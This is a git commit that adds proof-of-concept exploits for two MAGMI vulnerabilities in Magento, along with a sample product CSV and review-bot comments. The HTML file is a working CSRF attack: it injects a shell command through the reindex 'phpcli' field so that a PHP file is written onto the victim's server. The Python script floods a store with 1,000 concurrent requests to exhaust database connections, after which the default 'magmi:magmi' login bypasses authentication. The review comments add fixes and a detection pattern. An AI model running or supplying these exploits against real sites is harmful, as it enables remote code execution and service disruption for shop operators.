
Commit 16b1ce8

committed
Adding MAGMI PoCs
1 parent f716e74 commit 16b1ce8


3 files changed

+107
-0
lines changed


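--- a/MAGMI/cve-2020-5776/csrf_poc.html
+++ b/MAGMI/cve-2020-5776/csrf_poc.html
@@ -0,0 +1,48 @@
+<!DOCTYPE html>
+<html>
+- Host this file anywhere on internet<br>
+- Replace [TARGET] by the vulnerable Mgento domain<br>
+- Adjust the MAGMI path if you have a custom path<br>
+- Open the file in a browser as a victim while being authenticated to MAGMI<br>
+- A new executable file "info.php" will be created on the server<br><br>
+
+<body onload=run()>
+<script>
+// Replace [TARGET] with appropriate target url
+var targetUrl = "http://[TARGET]";
+
+function run() {
+var xhttp = new XMLHttpRequest();
+var data = "profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[http%3A%2F%2F10.254.130.95%2Feg%2Fsample.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=";
+var url = targetUrl + "/magmi/web/magmi_saveprofile.php";
+var method = "POST";
+
+xhttp.open(method, url);
+xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+xhttp.withCredentials = true;
+// Expect a security error related to CORS, but request is still sent
+xhttp.onerror = phase2;
+xhttp.send(data);
+}
+
+function phase2() {
+var xhttp = new XMLHttpRequest();
+var data = "engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update";
+var url = targetUrl + "/magmi/web/magmi_run.php";
+var method = "POST";
+
+xhttp.open(method, url);
+xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+xhttp.withCredentials = true;
+// Expect a security error related to CORS, but request is still sent
+xhttp.onerror = phase3;
+xhttp.send(data);
+}
+
+function phase3() {
+document.body.append("Success: A new file info.php should have been created here : " + targetUrl + "/magmi/web/info.php")
+}
+</script>
+</body>
+
+</html>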
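Review bot: The comment on lines 23 and 37, "Expect a security error related to CORS, but request is still sent", leaves out the reason, which is the part a reader fixing MAGMI needs. Both POSTs use `application/x-www-form-urlencoded`, so the browser sends them with the victim's credentials without a preflight and only withholds the response; I would reword the comment to `// form-urlencoded POST needs no CORS preflight: it is sent with credentials and only the response is blocked; the endpoint apparently checks no CSRF token or Origin`. The instruction text on lines 3-7 sits between `<html>` and `<body>` and misspells Magento as "Mgento"; an HTML comment at the top of the file would hold it without breaking the markup. A closing line in that comment naming the server-side fix (an anti-CSRF token or Origin check on `magmi_saveprofile.php` and `magmi_run.php`, and restricting who can reach `/magmi/web/`) would tell operators what to change.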

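--- a/MAGMI/cve-2020-5776/sample.csv
+++ b/MAGMI/cve-2020-5776/sample.csv
@@ -0,0 +1,34 @@
+sku,attribute_set,type,store,websites,configurable_attributes,color,full_size,name,description,short_description,full_features,att_ean,price,special_price,rrp,qty,is_in_stock,manage_stock,use_config_manage_stock,status,visibility,weight,category_ids,tax_class_id,thumbnail,small_image,image,media_gallery,arw_brand
+AF001WHIT2XL,Default,simple,admin,Default,"color,full_size",White,2XL,Chef's kit jacket with press stud (DD16)-White-2XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHIT2XS,Default,simple,admin,Default,"color,full_size",White,2XS,Chef's kit jacket with press stud (DD16)-White-2XS,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHIT3XL,Default,simple,admin,Default,"color,full_size",White,3XL,Chef's kit jacket with press stud (DD16)-White-3XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHIT4XL,Default,simple,admin,Default,"color,full_size",White,4XL,Chef's kit jacket with press stud (DD16)-White-4XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHITL,Default,simple,admin,Default,"color,full_size",White,L,Chef's kit jacket with press stud (DD16)-White-L,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHITM,Default,simple,admin,Default,"color,full_size",White,M,Chef's kit jacket with press stud (DD16)-White-M,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHITS,Default,simple,admin,Default,"color,full_size",White,S,Chef's kit jacket with press stud (DD16)-White-S,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHITXL,Default,simple,admin,Default,"color,full_size",White,XL,Chef's kit jacket with press stud (DD16)-White-XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001WHITXS,Default,simple,admin,Default,"color,full_size",White,XS,Chef's kit jacket with press stud (DD16)-White-XS,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
+AF001BLAC2XL,Default,simple,admin,Default,"color,full_size",Black,2XL,Chef's kit jacket with press stud (DD16)-Black-2XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,,Kustom Kit
+AF001,Default,configurable,admin,Default,"color,full_size",,,Chef's kit jacket with press stud (DD16),"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
+","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,"Catalog, Search",0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg::White;/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg::Black;/wetransfer-b10265/Alexandra/AX001_LS1.jpg;/wetransfer-b10265/Alexandra/AX005_LS1.jpg;,Kustom Kit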

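--- a/MAGMI/cve-2020-5777/auth_bypass.py
+++ b/MAGMI/cve-2020-5777/auth_bypass.py
@@ -0,0 +1,25 @@
+import asyncio
+import aiohttp
+
+# Usage : python3 ./http_flood.py
+# Response code 503 indicates a potential successful "Too many connections" error
+# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
+# whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
+# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
+
+# Replace [TARGET] with your Magento domain
+url = "http://[TARGET]/catalogsearch/result/?q=e"
+
+async def get(url):
+try:
+async with aiohttp.ClientSession() as session:
+async with session.get(url=url) as response:
+print("Got url {} with response code {}.".format(url, response.status))
+except Exception as e:
+print("Unable to get url {} due to error {}.".format(url, e.__class__))
+
+async def main():
+ret = await asyncio.gather(*[get(url) for _ in range(1000)])
+print("Finalized all. ret is a list of len {} outputs.".format(len(ret)))
+
+asyncio.run(main())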
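Review bot: The usage comment on line 4 names `./http_flood.py`, but this commit adds the file as `auth_bypass.py`, and line 7 spells "with" as "whith"; the header should read `# Usage : python3 ./auth_bypass.py`. Lines 5-7 describe the symptom but not the flaw, which from these comments appears to be that MAGMI accepts the default `magmi:magmi` login while it cannot reach the database; stating that in one line, together with the remediation (no default-credential fallback, restricted access to `/magmi/web/`), would make the header useful to whoever patches it. For detection, the sequence described here is a burst of `/catalogsearch/result/` requests answered with 503 followed by a Basic-auth request to `magmi.php`, which is worth recording in the comment as the pattern to alert on. The bare `asyncio.run(main())` on line 25 also runs on import; wrapping it in `if __name__ == "__main__":` is the usual guard.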
